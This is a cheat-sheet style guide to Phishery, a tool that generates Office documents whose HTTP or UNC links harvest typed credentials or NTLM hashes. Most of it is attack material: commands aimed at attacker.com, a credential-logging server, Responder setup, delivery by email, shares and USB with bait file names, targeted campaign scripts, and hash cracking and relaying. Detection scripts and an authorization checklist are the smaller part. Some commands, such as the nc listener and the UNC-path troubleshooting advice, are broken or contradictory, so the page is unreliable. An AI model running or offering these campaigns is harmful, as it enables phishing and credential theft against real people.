Phishery

Overview

Phishery is a specialized tool designed for authorized penetration testing that generates Office documents embedded with credential harvesting payloads. The document references an external resource (over HTTP/HTTPS or a UNC path), so when a user opens the crafted Word, Excel, or PowerPoint file, Office either displays a basic authentication dialog that captures whatever credentials are typed in, or, for a UNC path, Windows attempts NTLM authentication to the remote share and leaks the NetNTLM hash. This technique exploits legitimate Office functionality to perform authorized social engineering assessments and security testing.

Capabilities:

  • Generate weaponized Office documents
  • Embed custom authentication prompts
  • Capture NTLM hashes
  • Support multiple Office formats
  • Configurable prompts and messages
  • Cross-platform delivery
  • Integration with credential capture servers

Installation

Linux/macOS

# Clone repository
git clone https://github.com/ryhanson/phishery.git
cd phishery

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x phishery.py

# Run
python phishery.py

Linux Installation (apt)

# Some distributions may have packages
sudo apt-get install phishery

# Or use pip
pip install phishery

macOS with Homebrew

# May be available in community repos
brew install phishery

# Or install from source
git clone https://github.com/ryhanson/phishery.git
cd phishery
pip install -r requirements.txt

Windows

# Clone repository
git clone https://github.com/ryhanson/phishery.git
cd phishery

# Install dependencies
pip install -r requirements.txt

# Run
python phishery.py

Docker

# Build container
docker build -t phishery .

# Run
docker run -it phishery python phishery.py

Basic Usage

Generate Weaponized Document

# Create basic malicious Word document
python phishery.py -t word -u http://attacker.com/capture

# PowerPoint document
python phishery.py -t powerpoint -u http://attacker.com/capture

# Excel document
python phishery.py -t excel -u http://attacker.com/capture

# Save with specific filename
python phishery.py -t word -u http://attacker.com/capture -o report.docx

Essential Commands

Command        Purpose
-t word        Generate Word document
-t excel       Generate Excel spreadsheet
-t powerpoint  Generate PowerPoint
-u URL         Set credential capture URL
-o filename    Output filename
-m message     Custom prompt message
-v             Verbose output

Document Generation

Word Document Payload

# Create Word document with UNC path
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\target.xlsx \
  -o malicious_report.docx

# With custom message
python phishery.py \
  -t word \
  -u \\\\192.168.1.100\\documents\\file.xlsx \
  -m "Please enter your credentials to open this document" \
  -o secure_document.docx

Excel Document Payload

# Create Excel with embedded link
python phishery.py \
  -t excel \
  -u \\\\attacker.com\\share\\workbook.xlsx \
  -o quarterly_report.xlsx

# With specific worksheet prompt
python phishery.py \
  -t excel \
  -u \\\\attacker.com\\analytics\\data.xlsx \
  -m "Corporate credentials required" \
  -o budget_analysis.xlsx

PowerPoint Document Payload

# Generate malicious presentation
python phishery.py \
  -t powerpoint \
  -u \\\\attacker.com\\slides\\presentation.pptx \
  -o company_briefing.pptx

# With theme reference
python phishery.py \
  -t powerpoint \
  -u \\\\attacker.com\\themes\\modern.pptx \
  -m "Open theme file to apply formatting" \
  -o quarterly_review.pptx

Credential Capture Setup

UNC Path Method (SMB)

# Using UNC paths for credential capture
python phishery.py \
  -t word \
  -u \\\\attacker.internal\\share\\document.docx \
  -o bait_document.docx

# With IP address
python phishery.py \
  -t word \
  -u \\\\10.0.0.50\\files\\report.xlsx \
  -o quarterly_data.docx

HTTP URL Method

# Using HTTP server for capture
python phishery.py \
  -t word \
  -u http://capture.server.com/auth \
  -o document.docx

# HTTPS endpoint
python phishery.py \
  -t word \
  -u https://corp-auth.company.com/verify \
  -o secure_form.docx

Responder Integration

# Setup Responder for NTLM capture
responder -I eth0 -dwPv

# Generate documents pointing to Responder
python phishery.py \
  -t word \
  -u \\\\<YOUR_IP>\\share\\file.docx \
  -o phishing_document.docx

# Monitor Responder logs
tail -f /usr/share/responder/logs/*

Advanced Configuration

Custom Prompts

# Standard prompt
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\document.docx \
  -m "This file is read-only. Enter your credentials to edit."

# IT support themed
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\patch.docx \
  -m "Security update required. Enter domain credentials."

# Manager approval themed
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\approval.docx \
  -m "Manager approval system. Please log in with corporate credentials."

Multiple Document Generation

#!/bin/bash
# Generate multiple variants

TARGETS=("user1" "user2" "user3")
SERVER="attacker.internal"

for target in "${TARGETS[@]}"; do
    python phishery.py \
      -t word \
      -u \\\\$SERVER\\share\\${target}_document.docx \
      -m "Personalized document for $target" \
      -o "${target}_report.docx"
done

Document Customization

# With document content
python phishery.py \
  -t word \
  -u \\\\attacker.com\\share\\document.docx \
  -m "Opening document..." \
  -c "This appears to be a legitimate document content" \
  -o legitimate_looking.docx

Capture Server Setup

Simple HTTP Listener

#!/bin/bash
# Basic credential logger

while true; do
    echo "Waiting for connections..."
    
    nc -l -p 80 -e bash -c \
      'echo -e "HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"Access\"\r\n\r\n"' | \
      tee -a captured_creds.txt
done

Python HTTP Server

# capture_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import logging

logging.basicConfig(filename='credentials.log', level=logging.INFO)

class CredentialHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log authorization header
        auth = self.headers.get('Authorization', 'None')
        logging.info(f"Credentials from {self.client_address[0]}: {auth}")
        
        self.send_response(401)
        self.send_header('WWW-Authenticate', 'Basic realm="Access"')
        self.end_headers()

if __name__ == '__main__':
    server = HTTPServer(('0.0.0.0', 80), CredentialHandler)
    server.serve_forever()

Run server:

python capture_server.py &

Responder for NTLM Capture

# Start Responder on listening interface
responder -I eth0 -wrPv

# Responder captures:
# - NTLM hashes
# - NTLMv2 responses
# - NetNTLM authentication

# Monitor captured credentials
cat /usr/share/responder/logs/*.txt

Apache with Basic Auth Logging

# Configure Apache to log auth attempts
<Directory /var/www/html/capture>
    AuthType Basic
    AuthName "Restricted"
    AuthUserFile /etc/apache2/.htpasswd
    Require valid-user
    
    # Log auth attempts
    LogFormat "%h %t \"%r\" %s %b \"%{Authorization}i\"" auth
    CustomLog /var/log/apache2/auth.log auth
</Directory>

Delivery Methods

Email Delivery

# Compose email with attachment
# To: target@company.com
# Subject: Important: Q4 Budget Review Needed
# Body: Please review and approve the attached quarterly budget document
# Attachment: quarterly_budget.docx (generated with phishery)

File Share Distribution

# Place on accessible network share
cp quarterly_report.docx /mnt/shared_documents/Q4_Report.docx

# Update shared folder with trojan document
cp generated_payload.docx \\server\shared\Annual_Review.docx

USB Distribution

# Copy to USB drive for physical distribution
cp malicious_document.docx /media/usb_drive/Important_Update.docx

# Label appropriately for social engineering
# e.g., "2026_Salary_Review_Instructions.docx"

Document Repository

# Upload to company document system
# - SharePoint
# - OneDrive
# - Google Drive (if compromised)
# - Internal wiki or documentation system

# Name to blend in with legitimate files
# Examples:
# - Employee_Handbook_2026.docx
# - Security_Policy_Update.docx
# - Benefits_Enrollment_2026.docx

NTLM Hash Capture

Hash Format

# Responder captures hashes like:
user::DOMAIN:nonce:response1:response2

# Example:
admin::COMPANY:0x123abc456:8a2d5e7c...

Hash Cracking

# Use hashcat to crack captured NTLM
hashcat -m 5500 hashes.txt wordlist.txt

# Use john the ripper
john --format=netntlm hashes.txt

# Hydra for online testing
hydra -L users.txt -p password smb://target.com

Hash Relay

# Use captured hashes directly with ntlmrelayx
python ntlmrelayx.py -t ldap://dc.company.com

# No password needed - relay the hash itself
# Requires same domain/network

Detection and Evasion

Detection Methods

# List the relationship parts; external links (HTTP/HTTPS/UNC) are declared there
unzip -l document.docx | grep -i "\.rels"

# Show every external relationship with its target (remote templates, linked files)
unzip -p document.docx 'word/_rels/*.rels' | \
  grep -oE '<Relationship[^>]*TargetMode="External"[^>]*/>'

# Examine the document body for references to those relationship ids
unzip -p document.docx word/document.xml | \
  grep -oE 'r:embed="[^"]*"|r:id="[^"]*"' | head -20

# Scan with YARA (the rules file comes first, then the target; -r is only for directories)
yara yara_rules.yar document.docx
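The grep checks above look at one part at a time; the package-level rule a defender actually wants is "any relationship with TargetMode="External" whose target is an HTTP(S) or UNC location". The following Python scanner is an added example, not code from this page or from the Phishery project: it walks every .rels part in an Office Open XML package and reports such relationships. It builds its own minimal, constructed .docx as test input and assumes (as remote-template injection does) that the injected link is an attachedTemplate relationship in word/_rels/settings.xml.rels; real documents contain more parts, which the scanner handles the same way.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Namespace of every .rels part in an Office Open XML package
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship type that makes Word fetch a template from the target on open
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# Target forms that reach a remote host: HTTP(S), file:// and UNC paths
REMOTE_TARGET = re.compile(r"^(https?://|file://|\\\\)", re.IGNORECASE)


def find_external_relationships(docx_bytes: bytes) -> List[Dict[str, object]]:
    """List every relationship whose TargetMode is External, across all .rels parts."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "remote": bool(REMOTE_TARGET.match(target)),
                })
    return findings


def is_suspicious(docx_bytes: bytes) -> bool:
    """True when any relationship points at a remote HTTP/UNC location."""
    return any(f["remote"] for f in find_external_relationships(docx_bytes))


def build_sample_docx(template_target: Optional[str]) -> bytes:
    """Constructed minimal package (not real Word output) used as test input.

    When template_target is given, an external attachedTemplate relationship is
    written to word/_rels/settings.xml.rels, the part where remote-template
    injection places it (an assumption of this example).
    """
    rels_open = ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<Relationships xmlns="%s">' % RELS_NS)
    settings_rels = rels_open
    if template_target is not None:
        settings_rels += ('<Relationship Id="rId1" Type="%s" Target="%s" '
                          'TargetMode="External"/>' % (ATTACHED_TEMPLATE, template_target))
    settings_rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("_rels/.rels", rels_open +
                     '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
                     'officeDocument/2006/relationships/officeDocument" '
                     'Target="word/document.xml"/></Relationships>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/'
                     'wordprocessingml/2006/main"><w:body/></w:document>')
        pkg.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Scan files given on the command line, or the constructed sample if none
    inputs = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or \
             [("sample.docx (constructed)",
               build_sample_docx("https://example.invalid/template.dotx"))]
    for label, data in inputs:
        print(label, "SUSPICIOUS" if is_suspicious(data) else "clean")
        for f in find_external_relationships(data):
            print("  %s: %s -> %s" % (f["part"], f["type"], f["target"]))
```

Run it with document paths as arguments to scan real files; with no arguments it scans the constructed sample. Because the check is on relationship metadata rather than document text, it is unaffected by how the bait content is worded, and it also catches external links in Excel and PowerPoint packages, which use the same relationship model.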

Defensive Measures

# Disable external content in Office
# Group Policy (Windows):
# Computer Configuration > Administrative Templates > 
# Microsoft Office 2016 > Security Settings > 
# Trust Center > Block all unmanaged add-ins

# User training on suspicious documents
# - Check sender legitimacy
# - Verify file extensions
# - Be cautious of permission requests
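The UNC-path variant only works if the workstation can reach the attacker's host on the SMB ports, which is why blocking outbound TCP/445 and TCP/139 at the perimeter, and alerting on attempts, is the standard network control alongside the Office settings and user training listed above. The script below is an added example, not from this page or from the tool: it parses constructed firewall log lines in a simplified format (an assumption of the example, not any vendor's real format) and reports internal hosts that tried to open SMB connections to addresses outside the RFC 1918 ranges, distinguishing attempts the firewall allowed from those it denied.

```python
import ipaddress
from typing import Dict, List, Optional

# SMB transport ports that a UNC path in a document makes Windows contact
SMB_PORTS = {445, 139}

# Address space treated as "inside"; adjust to the organisation's own ranges
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample lines in a simplified firewall log format (not taken from
# any real product): "<time> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto> <action>"
SAMPLE_LOG = """\
2024-05-01T09:12:03Z 10.20.30.41:50211 -> 10.20.30.5:445 tcp allow
2024-05-01T09:12:07Z 10.20.30.41:50212 -> 203.0.113.50:445 tcp allow
2024-05-01T09:12:09Z 10.20.30.41:50213 -> 203.0.113.50:443 tcp allow
2024-05-01T09:13:44Z 10.20.30.77:50300 -> 198.51.100.9:139 tcp deny
2024-05-01T09:14:01Z 10.20.30.77:50301 -> 198.51.100.9:445 tcp deny
2024-05-01T09:15:22Z 10.20.30.12:50400 -> 10.20.30.5:445 tcp allow
malformed line that the parser must skip
"""


def is_internal(ip) -> bool:
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line; return None for lines that do not fit the format."""
    try:
        ts, src, arrow, dst, proto, action = line.split()
        if arrow != "->":
            return None
        src_ip, src_port = src.rsplit(":", 1)
        dst_ip, dst_port = dst.rsplit(":", 1)
        return {
            "time": ts,
            "src": ipaddress.ip_address(src_ip), "sport": int(src_port),
            "dst": ipaddress.ip_address(dst_ip), "dport": int(dst_port),
            "proto": proto.lower(), "action": action.lower(),
        }
    except ValueError:  # wrong field count, bad address or bad port
        return None


def is_outbound_smb(ev: Dict[str, object]) -> bool:
    """Internal source talking SMB to an address outside the internal ranges."""
    return (ev["proto"] == "tcp" and ev["dport"] in SMB_PORTS
            and is_internal(ev["src"]) and not is_internal(ev["dst"]))


def find_outbound_smb(log_text: str) -> List[Dict[str, object]]:
    events = (parse_line(line) for line in log_text.splitlines())
    return [ev for ev in events if ev is not None and is_outbound_smb(ev)]


def summarize(events: List[Dict[str, object]]) -> Dict[str, Dict[str, object]]:
    """Per source host: attempt count, distinct destinations, and whether any
    connection was allowed through (an allowed one means the hash may have left)."""
    summary: Dict[str, Dict[str, object]] = {}
    for ev in events:
        entry = summary.setdefault(str(ev["src"]),
                                   {"attempts": 0, "destinations": set(), "allowed": False})
        entry["attempts"] += 1
        entry["destinations"].add(str(ev["dst"]))
        entry["allowed"] = entry["allowed"] or ev["action"] == "allow"
    return summary


if __name__ == "__main__":
    for host, info in summarize(find_outbound_smb(SAMPLE_LOG)).items():
        status = "ALLOWED - investigate host" if info["allowed"] else "blocked"
        print("%s: %d outbound SMB attempt(s) to %s [%s]" % (
            host, info["attempts"], ", ".join(sorted(info["destinations"])), status))
```

An allowed outbound SMB connection from a workstation should be treated as a likely NetNTLM leak: rotate the affected user's password and locate the document that triggered it. Adapt INTERNAL_NETS to the organisation's own address plan; the sample uses RFC 5737 documentation addresses as stand-ins for external hosts.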

Batch Campaign Generation

Campaign Script

#!/bin/bash
# Phishing campaign generator

TEMPLATE="document_template.docx"
TARGET_LIST="targets.txt"
CAPTURE_URL="http://attacker.com/capture"
OUTPUT_DIR="campaign_docs"

mkdir -p "$OUTPUT_DIR"

while IFS= read -r target; do
    echo "Generating document for: $target"
    
    # Create personalized document
    python phishery.py \
      -t word \
      -u "\\\\attacker.com\\share\\${target}_file.docx" \
      -m "Document for review by $target" \
      -o "$OUTPUT_DIR/${target}_document.docx"
    
    echo "Created: $OUTPUT_DIR/${target}_document.docx"
done < "$TARGET_LIST"

echo "Campaign documents generated in $OUTPUT_DIR/"

Tracking and Logging

#!/bin/bash
# Log campaign delivery

CAMPAIGN_LOG="campaign_log.txt"

{
    echo "Campaign Started: $(date)"
    echo "Target Count: $(wc -l < targets.txt)"
    echo "Documents: $(ls -1 campaign_docs/ | wc -l)"
    echo ""
    echo "Documents Generated:"
    ls -lh campaign_docs/
} | tee "$CAMPAIGN_LOG"

Compliance and Authorization

Required Documentation

# Obtain written authorization including:
# - Specific targets/users
# - Duration of assessment
# - Scope and objectives
# - Authorized delivery methods
# - Incident response procedures
# - Liability and legal boundaries

# Example authorization template:
# [Company Name] Penetration Test Authorization
# Test Date: YYYY-MM-DD
# Authorized Tester: [Your Name/Company]
# Scope: Social engineering assessment
# Methods: Phishing documents via email
# Targets: Listed users with manager approval
# Legal: [Liability statement]
# Signatures: Client authorization representative

Reporting Results

# Document findings:
# - Total documents sent
# - Click rate
# - Credentials captured
# - Systems accessed via captured credentials
# - Recommendations for improvement
# - Timeline and evidence

Troubleshooting

Common Issues

Document Corruption:

# Regenerate with simpler settings
python phishery.py -t word -u \\\\server\\share\\file.docx

# Test on clean system
# Verify Office version compatibility

Not Triggering Auth Prompt:

# Ensure UNC path format is correct
# Windows format: \\server\share\file
# Not: //server/share/file or \\server\\share\\file

# Test path manually
net use \\attacker.com\share

Credentials Not Captured:

# Verify listener is running and accessible
curl -u test:test http://attacker.com/capture

# Check firewall rules
sudo ufw allow 80/tcp

# Monitor network traffic
tcpdump -i eth0 -n port 80

Comparison with Similar Tools

Tool          Format         Capture Method    Difficulty
Phishery      Office         UNC/HTTP          Easy
Evilginx2     Reverse proxy  Credential page   Moderate
GoPhish       Email          Custom form       Easy
King Phisher  Full suite     Custom            Advanced

Authorized Use Only

Phishery must be used only for:

  • Authorized penetration testing
  • Authorized security assessments
  • Authorized red team exercises
  • Staff security awareness training (with disclosure)

ILLEGAL Uses:

  • Unauthorized credential theft
  • Corporate espionage
  • Identity fraud
  • Unauthorized access attempts

Mandatory Requirements

  • Written authorization from organization leadership
  • Clear scope and timeline
  • Documented methodology
  • Incident response plan
  • Proper confidentiality agreements
  • Licensed security professionals
  • Insurance/liability coverage

Post-Assessment

  • Return all captured credentials/hashes
  • Document vulnerabilities found
  • Provide remediation recommendations
  • Destroy test artifacts
  • Brief leadership on findings
  • Support security awareness training

Disclaimer

Phishery is a legitimate security testing tool. Unauthorized access to computer systems is illegal. Always obtain proper authorization before conducting security assessments. The author and maintainers are not responsible for misuse of this tool.